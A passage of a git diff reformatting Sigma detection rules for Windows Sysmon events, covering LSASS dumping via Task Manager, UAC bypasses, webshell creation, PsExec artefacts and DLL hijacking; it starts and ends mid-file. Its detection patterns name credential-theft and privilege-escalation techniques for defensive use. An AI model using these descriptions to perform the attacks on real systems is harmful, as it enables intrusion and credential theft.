a/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml @@ -1,12 +1,10 @@ title: VsCode Powershell Profile Modification id: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502 related: - - id: b5b78988-486d-4a80-b991-930eff3ff8bf - type: similar + - id: b5b78988-486d-4a80-b991-930eff3ff8bf + type: similar status: test -description: Detects the creation or modification of a vscode related powershell profile - which could indicate suspicious activity as the profile can be used as a mean - of persistence +description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml index 659fe676e..9b914b2c3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml @@ -1,8 +1,7 @@ title: Windows Terminal Profile Settings Modification By Uncommon Process id: 9b64de98-9db3-4033-bd7a-f51430105f00 status: experimental -description: Detects the creation or modification of the Windows Terminal Profile - settings file "settings.json" by an uncommon process. +description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. references: - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile - https://twitter.com/nas_bench/status/1550836225652686848 @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # Note: Add other potential common applications - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml index 8619c7c5d..c75a7fbb4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml @@ -1,8 +1,8 @@ title: WinSxS Executable File Creation By Non-System Process id: 34746e8c-5fb8-415a-b135-0abc167e912a related: - - id: 64827580-e4c3-4c64-97eb-c72325d45399 - type: derived + - id: 64827580-e4c3-4c64-97eb-c72325d45399 + type: derived status: experimental description: Detects the creation of binaries in the WinSxS folder by non-system processes references: diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml index b7fbae202..57e705f19 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml @@ -1,8 +1,7 @@ title: LiveKD Kernel Memory Dump File Created id: 814ddeca-3d31-4265-8e07-8cc54fb44903 status: experimental -description: Detects the creation of a file that has the same name as the default - LiveKD kernel memory dump. +description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,6 @@ detection: TargetFilename: C:\Windows\livekd.dmp condition: file_event and selection falsepositives: - - In rare occasions administrators might leverage LiveKD to perform live kernel - debugging. This should not be allowed on production systems. Investigate and - apply additional filters where necessary. + - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary. level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml index 848538ee1..0eb6892d5 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml @@ -1,8 +1,7 @@ title: LiveKD Driver Creation id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352 status: experimental -description: Detects the creation of the LiveKD driver, which is used for live kernel - debugging +description: Detects the creation of the LiveKD driver, which is used for live kernel debugging references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml index 05560631c..3e149baea 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml @@ -1,11 +1,10 @@ title: LiveKD Driver Creation By Uncommon Process id: 059c5af9-5131-4d8d-92b2-de4ad6146712 related: - - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352 - type: similar + - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352 + type: similar status: experimental -description: Detects the creation of the LiveKD driver by a process image other than - "livekd.exe". +description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -29,7 +28,6 @@ detection: - \livek64.exe condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - Administrators might rename LiveKD before its usage which could trigger this. - Add additional names you use to the filter + - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml index 066504356..68d75774c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml @@ -1,14 +1,9 @@ title: Process Explorer Driver Creation By Non-Sysinternals Binary id: de46c52b-0bf8-4936-a327-aace94f94ac6 status: experimental -description: 'Detects creation of the Process Explorer drivers by processes other - than Process Explorer (procexp) itself. - - Hack tools or malware may use the Process Explorer driver to elevate privileges, - drops it to disk for a few moments, runs a service using that driver and removes - it afterwards. - - ' +description: | + Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. + Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer - https://github.com/Yaxser/Backstab diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml index 1c49b2fda..49bc13398 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml @@ -1,8 +1,7 @@ title: Process Monitor Driver Creation By Non-Sysinternals Binary id: a05baa88-e922-4001-bc4d-8738135f27de status: experimental -description: Detects creation of the Process Monitor driver by processes other than - Process Monitor (procmon) itself. +description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml index 1e08d18ba..d73ca8337 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml @@ -1,11 +1,10 @@ title: PsExec Service File Creation id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: test -description: Detects default PsExec service filename which indicates PsExec service - installation and execution +description: Detects default PsExec service filename which indicates PsExec service installation and execution references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml index 3113c325d..a848a6378 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml @@ -1,9 +1,7 @@ title: PSEXEC Remote Execution File Artefact id: 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 status: test -description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec - command is executed. It gets written to the file system and will be recorded in - the USN Journal on the target system +description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system references: - https://aboutdfir.com/the-key-to-identify-psexec/ - https://twitter.com/davisrichardg/status/1616518800584704028 diff --git a/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml b/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml index 7391027aa..0f3768354 100644 --- a/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation Attempt Via .Exe.Local Technique id: 07a99744-56ac-40d2-97b7-2095967b0e03 status: test -description: Detects potential privilege escalation attempt via the creation of the - "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" +description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt diff --git a/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml b/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml index 23a5ae849..f75708e0e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml @@ -1,9 +1,7 @@ title: LSASS Process Memory Dump Creation Via Taskmgr.EXE id: 69ca12af-119d-44ed-b50f-a47af0ebc364 status: experimental -description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This - indicates a manual dumping of the LSASS.exe process memory using Windows Task - Manager. +description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. author: Swachchhanda Shrawan Poudel date: 2023/10/19 references: @@ -29,7 +27,6 @@ detection: - .DMP condition: file_event and selection falsepositives: - - Rare case of troubleshooting by an administrator or support that has to be investigated - regardless + - Rare case of troubleshooting by an administrator or support that has to be investigated regardless level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml b/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml index b3d5a3ab1..e4873bbe0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml +++ b/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml @@ -1,8 +1,7 @@ title: Hijack Legit RDP Session to Move Laterally id: 52753ea4-b3a0-4365-910d-36cff487b789 status: test -description: Detects the usage of tsclient share to place a backdoor on the RDP source - machine's startup folder +description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder author: Samir Bousseaden date: 2019/02/21 modified: 2021/11/27 diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml index 7d0ff14d4..e3a82eeea 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Consent and Comctl32 - File id: 62ed5b55-f991-406a-85d9-e8e8fdf18789 status: test -description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll - (UACMe 22) +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml index caf1c36a2..7d646efa7 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using .NET Code Profiler on MMC id: 93a19907-d4f9-4deb-9f91-aac4692776a6 status: test -description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe - DLL hijacking (UACMe 39) +description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml index f55769198..aac96e402 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml @@ -22,6 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: + # Removed the start just in case the logging backend doesn't expand ENV variables when they're used - \Microsoft\Event Viewer\RecentViews - \Microsoft\EventV~1\RecentViews filter: diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml index 71d41192a..bdc6963e3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using IDiagnostic Profile - File id: 48ea844d-19b1-4642-944e-fe39c2cc1fec status: test -description: Detects the creation of a file by "dllhost.exe" in System32 directory - part of "IDiagnosticProfileUAC" UAC bypass technique +description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique references: - https://github.com/Wh04m1001/IDiagnosticProfileUAC author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml index 5301e6041..07ab95ecd 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using NTFS Reparse Point - File id: 7fff6773-2baa-46de-a24a-b6eec1aba2d1 status: test -description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe - DLL hijacking (UACMe 36) +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml index 7b1ebb4fd..b5384ae8c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml @@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - File id: 155dbf56-e0a4-4dd0-8905-8a98705045e8 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml index f4b15dadc..099563d5c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - File id: 68578b43-65df-4f81-9a9b-92f32711a951 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml b/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml index 082a26821..c78f07854 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml @@ -1,12 +1,9 @@ title: VHD Image Download Via Browser id: 8468111a-ef07-4654-903b-b863a80bbc95 status: test -description: 'Detects creation of ".vhd"/".vhdx" files by browser processes. - - Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads - and evade security controls. - - ' +description: | + Detects creation of ".vhd"/".vhdx" files by browser processes. + Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ @@ -40,6 +37,7 @@ detection: - \seamonkey.exe - \vivaldi.exe - \whale.exe + # We don't use "endswith" to also match with ADS logs and ".vhdx". Example: "TargetFilename: C:\Users\xxx\Downloads\windows.vhd:Zone.Identifier" TargetFilename|contains: .vhd condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml index 3f5f489c5..69cd7e30b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml @@ -1,10 +1,8 @@ title: Visual Studio Code Tunnel Remote File Creation id: 56e05d41-ce99-4ecd-912d-93f019ee0b71 status: experimental -description: 'Detects the creation of file by the "node.exe" process in the ".vscode-server" - directory. Could be a sign of remote file creation via VsCode tunnel feature - - ' +description: | + Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml index d60a50a34..8febf22ce 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml @@ -1,11 +1,8 @@ title: Renamed VsCode Code Tunnel Execution - File Indicator id: d102b8f5-61dc-4e68-bd83-9a3187c67377 status: experimental -description: 'Detects the creation of a file with the name "code_tunnel.json" which - indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" - other than VsCode. - - ' +description: | + Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -24,6 +21,7 @@ detection: selection: TargetFilename|endswith: \code_tunnel.json filter_main_legit_name: + # Note: There might be other legitimate names for VsCode. Please add them if found Image|endswith: - \code-tunnel.exe - \code.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml b/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml index 9e3c1b8aa..801e22325 100644 --- a/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml +++ b/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml @@ -1,8 +1,7 @@ title: Potential Webshell Creation On Static Website id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 status: test -description: Detects the creation of files with certain extensions on a static web - site. This can be indicative of potential uploads of a web shell. +description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. references: - PT ESC rule and personal experience - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md @@ -35,18 +34,23 @@ detection: - \html\ selection_htdocs_ext: TargetFilename|contains: .ph - filter_main_temp: + # selection_tomcat_path: + # TargetFilename|contains: '\webapps\ROOT' + # selection_tomcat_ext: + # TargetFilename|contains: + # - '.jsp' # .jspx, .jspf + # - '.jsv' + # - '.jsw' + filter_main_temp: # FP when unpacking some executables in $TEMP TargetFilename|contains: - \AppData\Local\Temp\ - \Windows\Temp\ filter_main_system: - Image: System + Image: System # FP when backup/restore from drivers filter_main_legitimate: TargetFilename|contains: \xampp - condition: file_event and ((all of selection_wwwroot_* or all of selection_htdocs_*) - and not 1 of filter_main_*) + condition: file_event and ((all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*) falsepositives: - - Legitimate administrator or developer creating legitimate executable files in - a web application folder + - Legitimate administrator or developer creating legitimate executable files in a web application folder level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml b/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml index dd5faae69..bc3b8bfd4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml +++ b/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml @@ -1,8 +1,7 @@ title: Creation of an WerFault.exe in Unusual Folder id: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1 status: test -description: Detects WerFault copoed to a suspicious folder, which could be a sign - of WerFault DLL hijacking +description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking references: - https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/ author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml b/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml index d73fc1eb5..bf267eaee 100644 --- a/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml +++ b/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml @@ -1,11 +1,10 @@ title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File id: d353dac0-1b41-46c2-820c-d7d2561fc6ed related: - - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d - type: derived + - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d + type: derived status: test -description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via - winrm.vbs and copied cscript.exe (can be renamed) +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community diff --git a/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml b/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml index 4a35b5e55..47e292616 100644 --- a/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml +++ b/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml @@ -1,8 +1,7 @@ title: Wmiexec Default Output File id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb status: experimental -description: Detects the creation of the default output filename used by the wmiexec - tool +description: Detects the creation of the default output filename used by the wmiexec tool references: - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py @@ -21,9 +20,9 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|re: \\Windows\\__1\d{9}\.\d{1,7}$ - - TargetFilename|re: C:\\__1\d{9}\.\d{1,7}$ - - TargetFilename|re: D:\\__1\d{9}\.\d{1,7}$ + - TargetFilename|re: \\Windows\\__1\d{9}\.\d{1,7}$ # Admin$ + - TargetFilename|re: C:\\__1\d{9}\.\d{1,7}$ # C$ + - TargetFilename|re: D:\\__1\d{9}\.\d{1,7}$ # D$ condition: file_event and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml index 7a8dd7270..d6fa71e7f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: Wmiprvse Wbemcomn DLL Hijack - File id: 614a7e17-5643-4d89-b6fe-f9df1a79641c status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network and loading it for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml index 4b6e0681a..70e619d7c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - FileCreation id: e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f status: test -description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" - directory. Which could be indicative of UEFI based persistence method +description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -24,7 +23,6 @@ detection: TargetFilename: C:\Windows\System32\wpbbin.exe condition: file_event and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml b/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml index aa26ecbd5..675ee9616 100644 --- a/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml +++ b/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml @@ -1,12 +1,9 @@ title: Writing Local Admin Share id: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f status: test -description: 'Aversaries may use to interact with a remote network share using Server - Message Block (SMB). - +description: | + Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share author: frack113 diff --git a/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml b/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml index 2fd2aac3f..7fcfd74f3 100644 --- a/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml +++ b/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml @@ -21,6 +21,7 @@ detection: selection: Image|endswith: \cmstp.exe ImageLoaded|contains: + # Add more suspicious paths as you see fit in your env - \PerfLogs\ - \ProgramData\ - \Users\ diff --git a/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml b/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml index 03a9b620f..71f2e4a31 100644 --- a/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml +++ b/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml @@ -1,8 +1,7 @@ title: Amsi.DLL Loaded Via LOLBIN Process id: 6ec86d9e-912e-4726-91a2-209359b999b9 status: experimental -description: Detects loading of "Amsi.dll" by a living of the land process. This could - be an indication of a "PowerShell without PowerShell" attack +description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack references: - Internal Research - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ @@ -22,6 +21,7 @@ detection: selection: ImageLoaded|endswith: \amsi.dll Image|endswith: + # TODO: Add more interesting processes - \ExtExport.exe - \odbcconf.exe - \regsvr32.exe diff --git a/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml b/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml index 27edbfbe1..3de8726d6 100644 --- 